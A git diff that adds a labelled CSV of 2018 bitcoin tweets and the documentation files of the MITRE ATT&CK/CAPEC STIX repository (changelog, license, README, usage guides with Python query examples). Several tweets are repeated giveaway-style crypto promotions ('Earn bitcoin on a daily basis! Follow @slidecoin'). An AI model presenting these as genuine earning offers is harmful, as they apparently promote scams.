+0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:51:07 +0000 2018,@WhalePanda Satoshis Vision conference coming up. Brace for some good old bcash pumping / bitcoin mind games.,1.0 +Fri Mar 23 08:51:33 +0000 2018,Bitcoin value: $8509.35,0.0 +Fri Mar 23 08:51:56 +0000 2018,One Satori Coin is currently worth $8.47 USD #bitcoin #satori,1.0 +Fri Mar 23 08:52:08 +0000 2018,@sole24ore Imminente crack. Comprate bitcoin,0.0 +Fri Mar 23 08:52:20 +0000 2018,"Fri Mar 23 09:52:03 2018 (86:52) +USD : 8499.06 +Wght: 0.42 +Blk#: 514769 +Size: 974.9 KB +TXs: 1983 +Pool: 11299 (7.9 MB) +#bitcoin",0.0 +Fri Mar 23 08:52:45 +0000 2018,@rogerkver @Falkvinge Yes buy bitcoin sell Bitcoin cash,0.0 +Fri Mar 23 08:52:45 +0000 2018,@tonywestonuk Thanks. Can’t say I agree about Bitcoin. It just another form of money.,1.0 +Fri Mar 23 08:53:11 +0000 2018,New #bitcoin block 000000000000000000041cd647cc6d0b096cbacee10808127ead162784a3bcae mined at height 514769.,1.0 +Fri Mar 23 08:53:25 +0000 2018,"Hey join this awesome project, they're doing something mega outstanding! #ICO #Essentia https: //twitter.com/Essentia_one #Crypto #bitcoin",1.0 +Fri Mar 23 08:53:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:54:44 +0000 2018,@ChandlerGuo How can I get my bitcoin God?,0.0 +Fri Mar 23 08:54:53 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:55:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 08:55:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 diff --git a/cti-ATT-CK-v13.1/.gitignore b/cti-ATT-CK-v13.1/.gitignore new file mode 100644 index 0000000000000000000000000000000000000000..491420c629e9b85f0157d5a246d930719e929472 --- /dev/null +++ b/cti-ATT-CK-v13.1/.gitignore @@ -0,0 +1,6 @@ +hashes.json +*.pyc +.DS_Store +.idea +.vscode +venv diff --git a/cti-ATT-CK-v13.1/CHANGELOG.md b/cti-ATT-CK-v13.1/CHANGELOG.md new file mode 100644 index 0000000000000000000000000000000000000000..6e38a0b13a9012070951c2e042f438a948213033 --- /dev/null +++ b/cti-ATT-CK-v13.1/CHANGELOG.md @@ -0,0 +1,102 @@ + +# Changes to the ATT&CK/STIX Data Model + +## 25 April 2023 - ATT&CK Spec v3.1.0 + +Changes to ATT&CK in STIX for April 2023 ATT&CK Content Release (ATT&CK v13.0) + +* Restored the `labels` property for ICS mitigation objects. This property documents security controls for ICS mitigations. + +## 25 October 2022 - ATT&CK Spec v3.0.0 + +Changes to ATT&CK in STIX for October 2022 ATT&CK Content Release (ATT&CK-v12.0) + +* Added Campaign objects. For detailed information about the representation of Campaigns in ATT&CK/STIX, please see the campaign section of the [USAGE document](https://github.com/mitre/cti/blob/master/USAGE.md). + +## 25 April 2022 (ATT&CK v11) release + +NOTE: Changes to ATT&CK for the April 2022 (ATT&CK v11) release were initially omitted from this change log. + +As of the v11 content release, the following fields that previously were only available in the STIX 2.1 bundles are also available in STIX 2.0. + +* `x_mitre_modified_by_ref`: has been added to all object types. Defined in spec 2.0.0 below. +* `x_mitre_domains`: has been added to all non-relationship objects. Defined in spec 2.0.0 below. +* `x_mitre_attack_spec_version`: has been added to all object types. Defined in spec 2.1.0 below. + +## 21 October 2021 - ATT&CK Spec v2.1.0 +Changes to ATT&CK in STIX for October 2021 ATT&CK Content Release (ATT&CK-v10.0) + +| Feature | [Available in STIX 2.0](https://github.com/mitre/cti) | [Available in STIX 2.1](https://github.com/mitre-attack/attack-stix-data) | +|:--------|:-----------------------------------------------------:|:-------------------------------------------------------------------------:| +| Added full objects for data sources and data components. See [the data sources section of the USAGE document](https://github.com/mitre-attack/attack-stix-data/blob/master/USAGE.md#data-sources-and-data-components) for more information about data sources, data components, and their relationships with techniques. | :white_check_mark: | :white_check_mark: | +| Added `x_mitre_attack_spec_version` field to all object types. This field tracks the version of the ATT&CK Spec used by the object. Consuming software can use this field to determine if the data format is supported; if the field is absent the object will be assumed to use ATT&CK Spec version `2.0.0`. | :x: | :white_check_mark: | + +## 21 June 2021 - ATT&CK Spec v2.0.0 +Release of ATT&CK in STIX 2.1. + +The contents of this repository is not affected, but you can find ATT&CK in STIX 2.1 (ATT&CK spec v2.0.0+) on our new [attack-stix-data](https://github.com/mitre-attack/attack-stix-data) GitHub repository. Both MITRE/CTI (this repository) and attack-stix-data will be maintained and updated with new ATT&CK releases for the foreseeable future, but the data model of attack-stix-data includes quality-of-life improvements not found on MITRE/CTI. + +| Feature | [Available in STIX 2.0](https://github.com/mitre/cti) | [Available in STIX 2.1](https://github.com/mitre-attack/attack-stix-data) | +|:--------|:-----------------------------------------------------:|:-------------------------------------------------------------------------:| +| Added `x_mitre_modified_by_ref` field to all object types. This field tracks the identity of the individual or organization which created the current _version_ of the object. | :x: | :white_check_mark: | +| Added `x_mitre_domains` field to all non-relationship objects. This field tracks the domains the object is found in. | :x: | :white_check_mark: | +| Added [collection](https://github.com/center-for-threat-informed-defense/attack-workbench-frontend/blob/master/docs/collections.md) objects to track information about specific releases of the dataset and to allow the dataset to be imported into [ATT&CK Workbench](https://github.com/center-for-threat-informed-defense/attack-workbench-frontend/). | :x: | :white_check_mark: | +| Added a [collection index](https://github.com/center-for-threat-informed-defense/attack-workbench-frontend/blob/master/docs/collections.md) to list the contents of this repository and to allow the data to be imported into [ATT&CK Workbench](https://github.com/center-for-threat-informed-defense/attack-workbench-frontend/). | :x: | :white_check_mark: | + +## 29 April 2021 +Changes to ATT&CK in STIX for April 2021 ATT&CK Content Release (ATT&CK-v9.0) + +1. Replaced `GCP`, `AWS` and `Azure` platforms under the enterprise domain with `IaaS` (Infrastructure as a Service). +2. Added `Containers` and `Google Workspace` to the platforms of the enterprise domain. +3. Revised the data sources of the enterprise domain. Data sources are still represented as a string array, but the elements within that array are now formatted `"data source: data component"` to reflect the new data source representation. More information on the new data sources can be found on our [attack-datasources](https://github.com/mitre-attack/attack-datasources) GitHub repository. Note that the data sources in the ICS domain was not affected by this change. + +With the release of ATT&CK version 9 we are also hosting an excel representation of the knowledge base on our website. You can find that representation and more about ATT&CK tools on the updated [Working with ATT&CK](https://attack.mitre.org/resources/working-with-attack/) page. + +## 27 October 2020 +Changes to ATT&CK in STIX for October 2020 ATT&CK Content Release (ATT&CK-v8.0) + +1. Added new platforms under the enterprise domain: `Network` and `PRE`. +2. Deprecated the pre-ATT&CK domain. Pre-ATT&CK has been migrated to two new tactics in the Enterprise domain tagged with the `PRE` platform. Please see the new [PRE matrix](https://attack.mitre.org/matrices/enterprise/PRE/) for the replacing Enterprise tactics and techniques. All objects within the pre-ATT&CK domain have been marked as deprecated, along with a new description pointing to their new home in Enterprise. +3. Added the [ATT&CK for ICS domain](ics-attack). + +## 8 July 2020 - ATT&CK Spec v1.3.0 +Changes to ATT&CK in STIX for July 2020 ATT&CK Content Release (ATT&CK-v7.0) + +1. Added sub-techniques: + - A sub-technique is an attack-pattern where `x_mitre_is_subtechnique` is `true`. + - Relationships of type `subtechnique-of` between sub-techniques and techniques convey their hierarchy. + + For more information about the representation of sub-techniques in STIX, please see [the sub-techniques section of the USAGE document](USAGE.md#sub-techniques). +2. Revised the representation of deprecated objects. The first paragraph of deprecated objects' descriptions should in most cases convey the reason the object was deprecated. + +We've also rewritten the [USAGE](USAGE.md) document with additional information about the ATT&CK data model and more examples of how to access and use ATT&CK in Python. + +## 24 October 2019 +Changes to ATT&CK in STIX for October 2019 ATT&CK Content Release (ATT&CK-v6.0) +1. Added cloud platforms under the enterprise domain: `AWS`, `GCP`, `Azure`, `Office 365`, `Azure AD`, and `SaaS`. + +## 31 July 2019 +Changes to ATT&CK in STIX for July 2019 ATT&CK Content Release (ATT&CK-v5.0) +1. Descriptions added to relationships of type `mitigates` under the enterprise domain + +## 30 April 2019 - ATT&CK Spec v1.2.0 +Changes to ATT&CK in STIX for April 2019 ATT&CK Content Release (ATT&CK-v4.0) +1. `x_mitre_impact_type` added for enterprise techniques within the `Impact` tactic +2. Descriptions added to relationships between software/groups + +## 23 October 2018 - ATT&CK Spec v1.1.0 +Changes to ATT&CK in STIX for October 2018 ATT&CK Content Release (ATT&CK-v3.0) + +1. `x_mitre_platforms` added for enterprise malware/tools +2. `x_mitre_detection` added to attack-patterns +3. Custom MITRE attributes removed from descriptions in attack-patterns +4. Alias descriptions added for malware/tools/intrusion-sets as external references +5. Descriptions added to relationships between groups/attack-patterns in PRE-ATT&CK +6. Names of ATT&CK objects replaced in descriptions and x_mitre_detection fields with markdown links +7. `CAPEC ids` added to external references for attack-patterns +8. Citations in alias descriptions added as external references in the object containing the alias description +9. Added `x-mitre-tactic` and `x-mitre-matrix` objects +10. Changed ===Windows=== subheadings to ### Windows subheadings (Windows is just one example) +11. Added space between asterisks (ex. *Content to * Content) to populate markdown correctly +12. Changed "true" to True in `x_mitre_deprecated` +13. Added old ATT&CK IDs to Mobile/PRE-ATT&CK objects whose IDs have changed as `x-mitre-old-attack-id` diff --git a/cti-ATT-CK-v13.1/LICENSE.txt b/cti-ATT-CK-v13.1/LICENSE.txt new file mode 100644 index 0000000000000000000000000000000000000000..b994d688c86c1539bf2998b11890ff3c9ad2e058 --- /dev/null +++ b/cti-ATT-CK-v13.1/LICENSE.txt @@ -0,0 +1,38 @@ +ATT&CK® +=========================== +License +------- +The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK® for research, +development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce +MITRE's copyright designation and this license in any such copy. + +"© 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation." + +Disclaimers +----------- +MITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part +of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or +cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques +or variations on existing techniques not documented by ATT&CK. + +ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE +ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, +AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE +USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS +FOR A PARTICULAR PURPOSE. + +CAPEC™ +=========================== +License +------- +The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use Common Attack Pattern +Enumeration and Classification (CAPEC™) for research, development, and commercial purposes. Any copy you make for +such purposes is authorized provided that you reproduce MITRE’s copyright designation and this license in any such copy. + +Disclaimers +----------- +ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE +ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, +AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE +USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS +FOR A PARTICULAR PURPOSE. \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/README.md b/cti-ATT-CK-v13.1/README.md new file mode 100644 index 0000000000000000000000000000000000000000..69eaf199dd37a6647ffba85e6b1fe5fc5b928057 --- /dev/null +++ b/cti-ATT-CK-v13.1/README.md @@ -0,0 +1,32 @@ +# CTI + +This repository contains the MITRE ATT&CK® and CAPEC™ datasets expressed in STIX 2.0. See [USAGE](USAGE.md) or [USAGE-CAPEC](USAGE-CAPEC.md) for information on using this content with [python-stix2](https://github.com/oasis-open/cti-python-stix2). + +If you are looking for ATT&CK represented in STIX 2.1, please see the [attack-stix-data](https://github.com/mitre-attack/attack-stix-data) GitHub repository. Both MITRE/CTI (this repository) and attack-stix-data will be maintained and updated with new ATT&CK releases for the foreseeable future, but the data model of attack-stix-data includes quality-of-life improvements not found on MITRE/CTI. Please see the [attack-stix-data USAGE document](https://github.com/mitre-attack/attack-stix-data) for more information on the improved data model of that repository. + +## ATT&CK + +MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. + + + +## CAPEC + +Understanding how the adversary operates is essential to effective cyber security. CAPEC™ helps by providing a comprehensive dictionary of known patterns of attacks employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. It can be used by analysts, developers, testers, and educators to advance community understanding and enhance defenses. + +- Focuses on application security +- Enumerates exploits against vulnerable systems +- Includes social engineering / supply chain +- Associated with Common Weakness Enumeration (CWE) + + + +## STIX + +Structured Threat Information Expression (STIX™) is a language and serialization format used to exchange cyber threat intelligence (CTI). + +STIX enables organizations to share CTI with one another in a consistent and machine readable manner, allowing security communities to better understand what computer-based attacks they are most likely to see and to anticipate and/or respond to those attacks faster and more effectively. + +STIX is designed to improve many different capabilities, such as collaborative threat analysis, automated threat exchange, automated detection and response, and more. + + diff --git a/cti-ATT-CK-v13.1/USAGE-CAPEC.md b/cti-ATT-CK-v13.1/USAGE-CAPEC.md new file mode 100644 index 0000000000000000000000000000000000000000..c12be3754a0166faf6c807ddf209a61ef0e172b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/USAGE-CAPEC.md @@ -0,0 +1,136 @@ +# Introduction +This document describes how to query and manipulate CAPEC data in this repository. Machine-readable CAPEC data is available in +a JSON-based [STIX 2.0 and STIX 2.1 formats](https://oasis-open.github.io/cti-documentation/stix/intro). See [Release Notes](#release-notes) for any changes to the generation of the STIX CAPEC data. + +STIX 2.x is just JSON and so should be very accessible from Python and other programming languages. If you are using Python, the [python-stix2](https://github.com/oasis-open/cti-python-stix2) library can help you work with the content as shown in the examples below. + +# Mapping Concepts +First, we must describe how CAPEC objects and properties map to STIX 2.x objects and properties. + +## Objects +In CAPEC, the main object is the Attack Pattern. Most Attack Pattern also have Mitigations. There are other types of objects in CAPEC (e.g, Category, View, etc.), but these are not (currently) part of the repository. + +The STIX types are found as literal strings assigned to the `type` property of the STIX JSON object. The STIX 2.x object called "Attack Pattern" corresponds to a CAPEC attack pattern. In STIX 2.x, there are objects called "Course(s) of Action" which can be used to describe CAPEC Mitigations. + +## Properties +The following is a table mapping of CAPEC properties to STIX properties. Some of these properties are standard STIX properties, while others were custom-created for compatibility with CAPEC. These properties are accessed from STIX objects as JSON properties. + +### Attack Pattern Properties +| CAPEC 3.6 Property | STIX Properties | STIX type | +| --------------- | --------------- | --------------- | +**Name** | `name` | string | +**Description** | `description` | string +**Extended_Definition** | `x_capec_extended_definition` | string +**Abstraction** | `x_capec_abstraction` | enumeration(`Meta, Standard, Detailed`) +**Alternate\_Terms** | `x_capec_alternate_terms` | list(string) +**Consequences** | `x_capec_consequences` | dictionary(enumeration(`High, Medium, Low`), string) +**Example\_Instances** | `x_capec_example_instances` | list(string) +**Execution\_Flows** | `x_capec_execution_flows` | (XHTML) string +**Likelihood\_Of\_Attack** | `x_capec_likelihood_of_attack` | enumeration(`High, Medium, Low`) +**Notes** | **Other\_Notes** | `x_capec_notes` | list(string) +**Prerequisites** | `x_capec_prerequisites` | list(string) +**Skills\_Required** | `x_capec_skills_required` | dictionary(string, enumeration(`High, Medium, Low`)) +**Typical\_Severity** | `x_capec_typical_severity` | enumeration(`High, Medium, Low`) +**ID** | `external_references[i].external_id where external_references[i].source_name == "capec"` | integer +**Related\_Weaknesses** | `external_references[i].external_id where external_references[i].source_name == "cwe"` | integer +**References** | `external_references[i].external_id where external_references[i].source_name == "reference_from_CAPEC"` | `external-reference` +**Mitigation** | `relationship_type == "mitigates"` | `relationship` + +### Attack Pattern Relationships +| CAPEC 3.6 Relationship | STIX Properties | STIX type | +| --------------- | --------------- | --------------- | +**parent_of** | `x_capec_parent_of_refs` | list(identifier) +**child_of** | `x_capec_child_of_refs` | list(identifier) +**can_precede** | `x_capec_can_precede_refs` | list(identifier) +**can_follow** | `x_capec_can_follow_refs` | list(identifier) +**peer_of** | `x_capec_peer_of_refs` | list(identifier) + +CAPEC 3.6 properties not mapped (at this time): **Indicators**, **Taxonomy\_Mappings**, **Content\_History** + +CAPEC 3.6 properties not appropriate to map: **Status** + +# Using Python and STIX 2.x +In this section, we will describe how to query and manipulate CAPEC data that has been stored in a STIX 2.x repository. A Python library has been created for using and creating STIX 2.x data by the OASIS Technical Committee for Cyber Threat Intelligence, which develops the STIX standard. This library abstracts storage and transport details so that the same code can be used to interact with data locally on the filesystem or in memory, or remotely via [TAXII](https://oasis-open.github.io/cti-documentation/taxii/intro). The source code, installation instructions, and basic documentation for the library can be found [here](https://github.com/oasis-open/cti-python-stix2). There is a more thorough [API documentation](http://stix2.readthedocs.io/en/latest/overview.html) as well. + +## Python Library +To begin querying STIX 2.x data, you must first have a [DataSource](http://stix2.readthedocs.io/en/latest/guide/datastore.html). For these examples, we will simply use a [FileSystemSource](http://stix2.readthedocs.io/en/latest/guide/filesystem.html). The CAPEC corpus must first be cloned or downloaded from [GitHub](https://github.com/mitre/cti). + +### Get all Attack Patterns +Once the stix2 Python library is installed and the corpus is acquired, we need to open the DataStore for querying: + +```python +from stix2 import FileSystemSource +fs = FileSystemSource('./cti/capec') +``` + +When creating the DataSource, the keyword agrument `allow_custom` must be set to `True`. This is because the CAPEC data uses several custom properties which are not part of the STIX 2.x specification (`x_capec_prerequisites`, `x_capec_example_instances`, etc). + +To perform a query, we must define a [Filter](http://stix2.readthedocs.io/en/latest/guide/datastore.html#Filters). As of this writing, a filter must, at a minimum, specify object `id`'s or an object `type`. The following filter can be used to retrieve all CAPEC attack patterns: + +```python +from stix2 import Filter +filt = Filter('type', '=', 'attack-pattern') +``` + +Once this filter is defined, you can pass it to the DataSource `query` function in order to actually query the data: + +```python +attack_patterns = fs.query([filt]) +``` + +Notice that the `query` function takes a **list** of filters. These filters are logically AND'd together during the query. As of this writing, `allow_custom` must be set to `True` in order to query CAPEC data. This is because the CAPEC data uses several custom properties which are not part of the STIX 2.0 specification (`x_capec_prerequisites`, `x_capec_example_instances`, etc). + +**For the remaining examples, these imports and the FileSystemStore initialization will be omitted.** + + +### Get any object by CAPEC ID +In this example, the STIX 2.x type must be passed into the function. Here we query for the attack pattern with ID `66` (*SQL Injection*). + +```python +def get_attack_pattern_by_capec_id(src, capec_id): + filt = [ + Filter('type', '=', 'attack-pattern'), + Filter('external_references.external_id', '=', 'CAPEC-' + capec_id), + Filter('external_references.source_name', '=', 'capec'), + ] + return src.query(filt) + +get_attack_pattern_by_capec_id(fs, '66') +``` + +### Get all Mitigations for specific Attack Pattern +The mitigations for a technique are stored in objects separate from the technique. These objects are found through a `mitigates` relationship. + +```python +def get_mitigations_by_attack_pattern(src, ap_stix_id): + relations = src.relationships(ap_stix_id, 'mitigates', target_only=True) + return src.query([ + Filter('type', '=', 'course-of-action'), + Filter('id', 'in', [r.source_ref for r in relations])]) + +ap = get_attack_pattern_by_capec_id(fs, '66')[0] +get_mitigations_by_attack_pattern(fs, ap.id) +``` + +### Release Notes + +The STIX CAPEC data is generated by a python script named `capec2stix`. In this section the changes to the script for each new CAPEC release is listed. + +## Release for CAPEC 3.6 + +* Added the `x_capec_extended_definition` property + +## Release for CAPEC 3.5 + +* Added functionality to infer CAPEC ParentOf and CanFollow relationships: + - CAPEC does not explicitly state these relationships, so they needed to be inferred by looking at the children's "ChildOf" relationship and the can follows' "CanPrecede" relationship and work backwards + - A global map of CAPEC ids to STIX ids was created by iterating through all CAPEC objects and creating STIX ids + - Global maps of CAPEC ids to list of children CAPEC ids and list of CAPEC ids that can follow was created by iterating through all CAPEC objects + - When creating STIX Attack Pattern objects, the child and can follow maps are used to find the relationships that are not explicitly stated in the CAPEC object and the STIX id map is used to get the STIX ID for the related CAPECs +* Added the following properties to the Attack Pattern STIX object: + - `x_capec_child_of_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object is a child of + - `x_capec_parent_of_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object is a parent of + - `x_capec_can_precede_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object can precede + - `x_capec_can_follow_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object can follow + - `x_capec_peer_of_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object is a peer of +* Added "allow_custom=True" as a flag when creating STIX bundles to satisfy the requirements for the new STIX release diff --git a/cti-ATT-CK-v13.1/USAGE.md b/cti-ATT-CK-v13.1/USAGE.md new file mode 100644 index 0000000000000000000000000000000000000000..89aa146075536d1eaaf2f29c0a72231afbaa8d11 --- /dev/null +++ b/cti-ATT-CK-v13.1/USAGE.md @@ -0,0 +1,1182 @@ +# Introduction + +This document describes how to query and manipulate ATT&CK data from either this repository or the ATT&CK TAXII server, as well as the formatting of the data itself. + +The programmatic uses of ATT&CK demonstrated in this document utilize the [stix2 python library](https://github.com/oasis-open/cti-python-stix2). Please refer to the [STIX2 Python API Documentation](https://stix2.readthedocs.io/en/latest/) for more information on how to work with STIX programmatically. See also the section on [Requirements and imports](#requirements-and-imports). + +This document describes how ATT&CK implements and extends the STIX format. To find out more about STIX, please see [the STIX 2.0 website](https://oasis-open.github.io/cti-documentation/stix/intro). + +We also recommend reading the [ATT&CK Design and Philosophy Paper](https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf), which describes high-level overall approach, intention, and usage of ATT&CK. + +If you are looking for ATT&CK data represented in STIX 2.1, please see our [attack-stix-data](https://github.com/mitre-attack/attack-stix-data) GitHub repository. The accompanying [USAGE document](https://github.com/mitre-attack/attack-stix-data/blob/master/USAGE.md) includes more information on the improved data model of that repository. + +## Table of Contents + +- [Introduction](#introduction) + - [Table of Contents](#table-of-contents) + - [The ATT&CK data model](#the-attck-data-model) + - [Extensions of the STIX spec](#extensions-of-the-stix-spec) + - [IDs in ATT&CK](#ids-in-attck) + - [ATT&CK IDs](#attck-ids) + - [STIX IDs](#stix-ids) + - [Other IDs](#other-ids) + - [ATT&CK Types](#attck-types) + - [Matrices](#matrices) + - [Mapping matrices, tactics and techniques](#mapping-matrices-tactics-and-techniques) + - [Tactics](#tactics) + - [Techniques](#techniques) + - [Sub-Techniques](#sub-techniques) + - [Procedures](#procedures) + - [Mitigations](#mitigations) + - [Collisions with technique ATT&CK IDs](#collisions-with-technique-attck-ids) + - [Groups](#groups) + - [Software](#software) + - [Data Sources and Data Components](#data-sources-and-data-components) + - [Data Sources](#data-sources) + - [Data Components](#data-components) + - [Campaigns](#campaigns) + - [Relationships](#relationships) + - [Accessing ATT&CK data in python](#accessing-attck-data-in-python) + - [Requirements and imports](#requirements-and-imports) + - [stix2](#stix2) + - [taxii2client](#taxii2client) + - [Access local content](#access-local-content) + - [Access via FileSystemSource](#access-via-filesystemsource) + - [Access via bundle](#access-via-bundle) + - [Access live content](#access-live-content) + - [Access from the ATT&CK TAXII server](#access-from-the-attck-taxii-server) + - [Access from Github via requests](#access-from-github-via-requests) + - [Access a specific version of ATT&CK](#access-a-specific-version-of-attck) + - [Access multiple domains simultaneously](#access-multiple-domains-simultaneously) + - [Python recipes](#python-recipes) + - [Getting an object](#getting-an-object) + - [By STIX ID](#by-stix-id) + - [By ATT&CK ID](#by-attck-id) + - [By name](#by-name) + - [By alias](#by-alias) + - [Getting multiple objects](#getting-multiple-objects) + - [Objects by type](#objects-by-type) + - [Getting techniques or sub-techniques](#getting-techniques-or-sub-techniques) + - [Getting software](#getting-software) + - [Objects by content](#objects-by-content) + - [Techniques by platform](#techniques-by-platform) + - [Techniques by tactic](#techniques-by-tactic) + - [Tactics by matrix](#tactics-by-matrix) + - [Objects created or modified since a given date](#objects-created-or-modified-since-a-given-date) + - [Getting related objects](#getting-related-objects) + - [Relationships microlibrary](#relationships-microlibrary) + - [Getting techniques used by a group's software](#getting-techniques-used-by-a-groups-software) + - [Working with deprecated and revoked objects](#working-with-deprecated-and-revoked-objects) + - [Removing revoked and deprecated objects](#removing-revoked-and-deprecated-objects) + - [Getting a revoking object](#getting-a-revoking-object) + +## The ATT&CK data model + +The data in this repository is STIX 2.0 and divided into folders, one for each domain of ATT&CK. These domains generally follow the same format with a few departures. Domain differences will be noted in the relevant sections of this document. + +ATT&CK uses a mix of predefined and custom STIX objects to implement ATT&CK concepts. The following table is a mapping of ATT&CK concepts to STIX 2.0 objects: + +| ATT&CK concept | STIX object type | Custom type? | +|:------------|:----------|:---| +| [Matrix](#matrices) | `x-mitre-matrix` | yes | +| [Tactic](#tactics) | `x-mitre-tactic` | yes | +| [Technique](#techniques) | [attack-pattern](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230921) | no | +| [Sub-technique](#sub-techniques) | [attack-pattern](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230921) where `x_mitre_is_subtechnique = true` | no | +| [Procedure](#procedures) | [relationship](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230970) where `relationship_type = "uses"` and `target_ref` is an `attack-pattern` | no | +| [Mitigation](#mitigations) | [course-of-action](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230929) | no | +| [Group](#groups) | [intrusion-set](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230941) | no | +| [Software](#software) | [malware](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230945) or [tool](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230961) | no | +| [Data Source](#data-source) | `x-mitre-data-source` | yes | +| [Campaign](#campaigns) | [campaign](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230925) | no | + +Two additional object types are found in the ATT&CK catalog: + +| STIX object type | About | +|:-----------------|:------| +| [identity](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230933) | Referenced in the `created_by_ref` of all objects to state that the MITRE Corporation created the object | +| [marking-definition](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part1-stix-core/stix-v2.0-csprd01-part1-stix-core.html#_Toc476227338) | Referenced in the `object_marking_refs` of all objects to express the MITRE Corporation copyright | + +### Extensions of the STIX spec + +There are three general ways that ATT&CK extends the STIX 2.0 format: + +- Custom object types. Object types prefixed with `x-mitre-`, e.g `x-mitre-matrix`, are custom STIX types extending the STIX 2.0 spec. They follow the general [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920) but describe concepts not covered by types defined in STIX 2.0. + +- Extensions of existing object types. Fields extending the STIX 2.0 spec are prefixed with `x_mitre_`, e.g `x_mitre_platforms` in `attack-patterns`. + + All objects except relationships can have the following extended properties applied: + + | Field | Type | Description | + |:------|:-----|:------------| + | `x_mitre_version` | string | The version of the object in format `major.minor` where `major` and `minor` are integers. ATT&CK increments this version number when the object content is updated. | + | `x_mitre_contributors` | string[] | People and organizations who have contributed to the object. | + | `x_mitre_deprecated` | boolean | See [Working with deprecated and revoked objects](#Working-with-deprecated-and-revoked-objects). | + +- New relationship types. Unlike custom object types and extended fields, custom relationship types are **not** prefixed with `x_mitre_`. You can find a full list of relationship types in the [Relationships](#Relationships) section, which also mentions whether the type is a default STIX type. + +Please see also the STIX documentation on [customizing STIX](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part1-stix-core/stix-v2.0-csprd01-part1-stix-core.html#_Toc476227365). + +### IDs in ATT&CK + +Objects in ATT&CK may have several different kinds of IDs. + +#### ATT&CK IDs + +The most commonly used ID format is what is referred to as the ATT&CK ID or simply ID. Each different type of ATT&CK object has its own variation upon the ATT&CK ID format: + +| ATT&CK concept | ID format | +|:------------|:----------| +| [Matrix](#matrices) | `MAxxxx` | +| [Tactic](#tactics) | `TAxxxx` | +| [Technique](#techniques) | `Txxxx` | +| [Sub-Technique](#sub-techniques) | `Txxxx.yyy` | +| [Mitigation](#mitigations) | `Mxxxx` | +| [Group](#groups) | `Gxxxx` | +| [Software](#software) | `Sxxxx` | +| [Data Source](#data-source) | `DSxxxx` | +| [Campaign](#campaigns) | `Cxxxx` | + +ATT&CK IDs are typically, but not always, unique. See [Collisions with Technique ATT&CK IDs](#collisions-with-technique-attck-ids) for an edge case involving ID collisions between mitigations and techniques. + +ATT&CK IDs can be found in the first external reference of all objects except for relationships (which don't have 